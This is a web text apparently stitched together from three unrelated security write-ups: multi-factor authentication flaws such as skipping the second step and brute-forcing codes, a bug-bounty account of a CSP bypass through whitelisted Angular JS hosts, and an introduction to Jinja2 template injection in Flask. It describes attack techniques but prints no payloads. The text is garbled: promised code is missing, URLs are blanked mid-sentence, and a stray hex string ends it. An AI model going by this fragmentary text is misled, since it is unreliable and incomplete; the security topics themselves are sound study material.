In this section, we'll look at some of the vulnerabilities that can occur in multi-factor authentication mechanisms. We've also provided several interactive labs to demonstrate how you can exploit these vulnerabilities in multi-factor authentication.
While it is sometimes possible for an attacker to obtain a single knowledge-based factor, such as a password, being able to simultaneously obtain another factor from an out-of-band source is considerably less likely. For this reason, two-factor authentication is demonstrably more secure than single-factor authentication. However, as with any security measure, it is only ever as secure as its implementation. Poorly implemented two-factor authentication can be beaten, or even bypassed entirely, just as single-factor authentication can.
It is also worth noting that the full benefits of multi-factor authentication are only achieved by verifying multiple different factors. Verifying the same factor in two different ways is not true two-factor authentication. Email-based 2FA is one such example. Although the user has to provide a password and a verification code, accessing the code only relies on them knowing the login credentials for their email account. Therefore, the knowledge authentication factor is simply being verified twice.
Verification codes are usually read by the user from a physical device of some kind. Many high-security websites now provide users with a dedicated device for this purpose, such as the RSA token or keypad device that you might use to access your online banking or work laptop. In addition to being purpose-built for security, these dedicated devices also have the advantage of generating the verification code directly. It is also common for websites to use a dedicated mobile app, such as Google Authenticator, for the same reason.
On the other hand, some websites send verification codes to a user's mobile phone as a text message. While this is technically still verifying the factor of "something you have", it is open to abuse. Firstly, the code is being transmitted via SMS rather than being generated by the device itself. This creates the potential for the code to be intercepted. There is also a risk of SIM swapping, whereby an attacker fraudulently obtains a SIM card with the victim's phone number. The attacker would then receive all SMS messages sent to the victim, including the one containing their verification code.
If the user is first prompted to enter a password, and then prompted to enter a verification code on a separate page, the user is effectively in a "logged in" state before they have entered the verification code. In this case, it is worth testing to see if you can directly skip to "logged-in only" pages after completing the first authentication step. Occasionally, you will find that a website doesn't actually check whether or not you completed the second step before loading the page.
Sometimes flawed logic in two-factor authentication means that after a user has completed the initial login step, the website doesn't adequately verify that the same user is completing the second step.
This is extremely dangerous if the attacker is then able to brute-force the verification code as it would allow them to log in to arbitrary users' accounts based entirely on their username. They would never even need to know the user's password.
As with passwords, websites need to take steps to prevent brute-forcing of the 2FA verification code. This is especially important because the code is often a simple 4 or 6-digit number. Without adequate brute-force protection, cracking such a code is trivial.
Some websites attempt to prevent this by automatically logging a user out if they enter a certain number of incorrect verification codes. This is ineffective in practice because an advanced attacker can even automate this multi-step process by creating macros for Burp Intruder. The Turbo Intruder extension can also be used for this purpose.
A CSP works by restricting certain access patterns to be used by the content on the loaded document. This is done by declaring a list of policy directives (throgh a CSP header or through meta tags) consisting of a directive name and a list of allowed sources for that directive.
In the case of XSS, the most interesting directive is script-src as it describes how the document is allowed to load JavaScript. Two common ways to set up a script-src directive are either through a whitelist approach or using the (often safer) nonce-based approach. When specifying a nonce in the CSP, any script on the page will be allowed to load but only as long as the script tag is decorated with the same nonce value
If a site is instead using a whitelist of URLs, the page runs the risk that any of these URLs hosting dangerous libraries that an attacker can abuse to escalate to a full XSS. One library that often causes CSP bypasses is Angular JS but there are an abundance of other script sources that can be abused.
A feature of CSP that tend to confuses people, both when implementing and also when trying to find bypasses, is when a nonce is declared in the script-src directive together with the keyword strict-dynamic. This combination will allow any script with a nonce attribute to inject additional script elements into the DOM and have them execute, even if these new script tags lack the declared nonce value. This combination of nonce and strict-dynamic will also make the page ignore any additional whitelisted URLs in the script-src directive.
As we can see, there is a nonce but no strict-dynamic keyword. As we now know, this means that any URL in the whitelist is allowed as a script source. The list probably contains multiple URLs that host dangerous gadgets (see a tweet by @renniepak for a gadget using -analytics.com), but the interesting one for us is as shown in the CTF writeup. (Also note that the CSP evaluator does not know about the Angular package in Recaptcha)
This is described in HTML spec here and there is also an interesting discussion about it here. From JavaScript, we just need to access the nonce attribute of a DOM node using regular node.nonce notation. To find any node with the current page nonce, we can do like this
I verified that this worked as a full CSP bypass on Twitter.com, but at that time, @godiego had already gotten help from another researcher. Still, I was happy with what I had crafted and thought that I might be able to use it elsewhere.
In this blog post, Gareth examines a third-party dependency called Pitwik PRO and finds a CSP bypass hidden inside using an Angular JS vector. If they had deployed the dependency, they would have opened up a hole in their defense. Gareth writes
Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it was safe to deploy on portswigger.net.
Sometimes, in bug bounties, the stars align. I went to portswigger.net to check out their CSP, and to my surprise, the same setup from Twitter was present. The CSP had a whitelist containing both and , which both host the about/js/main.min.js file containing Angular JS. The CSP also had a nonce configured but lacked the strict-dynamic keyword, just as on Twitter.com.
What this meant was that I could use the same payload as on Twitter to bypass the CSP on PortSwigger.net. The only issue was that I had no HTML injection to tie the bypass to. I spent some time looking for such an injection to use for a full exploit but did not feel too motivated to keep at it. I decided to report the CSP issue as is and point to the blog post from Gareth.
After an initial fix, I also pointed out that they were lacking the form-action directive, which could lead to credential leaks, and they decided to fix that as well. They awarded me a bounty of 1000$ for the CSP bypass and a bonus of 500$ for the form-action issue.
Flask, a lightweight Python web application framework, is one of my favorite and most-used tools. While it is great for building simple APIs and microservices, it can also be used for fully-fledged web applications relying on server-side rendering. To so, Flask depends on the powerful and popular Jinja2 templating engine.
Fundamentally, SSTI is all about misusing the templating system and syntax to inject malicious payloads into templates. As these are rendered on the server, they provide a possible vector for remote code execution. For a more thorough introduction, definitely have a look at this great article by PortSwigger.
Jinja2 is a powerful templating engine used in Flask. While it does many more things, it essentially allows us to write HTML templates with placeholders that are later dynamically populated by the application.
Also, it is important to realize that Jinja2 has a quite elaborate templating syntax. Instead of just placeholders, we can also have, for example, loops and conditions in these templates. Most importantly, however, the placeholders have access to the actual objects passed via Flask. If we are, for example, passing a list example_list, we can use example_list[0] as we would in our regular Python code.
In Python, everything is an object! While this is a fundamental property and feature of the language, we are going to focus on one very particular thing one can do: navigating the inheritance tree of objects and, thus, classes.
In the following example, we are trying to read a file called test.txt using _io.FileIO. However, instead of just using regular function calls, we will start from a str object and work our way to the _io.FileIO class.
Do not let this confuse or discourage you! Ultimately, we are still working with a regular file object. However, instead of just using, for example, open(), we navigated to it starting from a str object.
Also, keep in mind that there are many ways to get to the same destination. This was, for demonstration purposes, a very extensive example. Feel free to explore better (i.e., shorter) ways of getting the same result!
c80f0f1006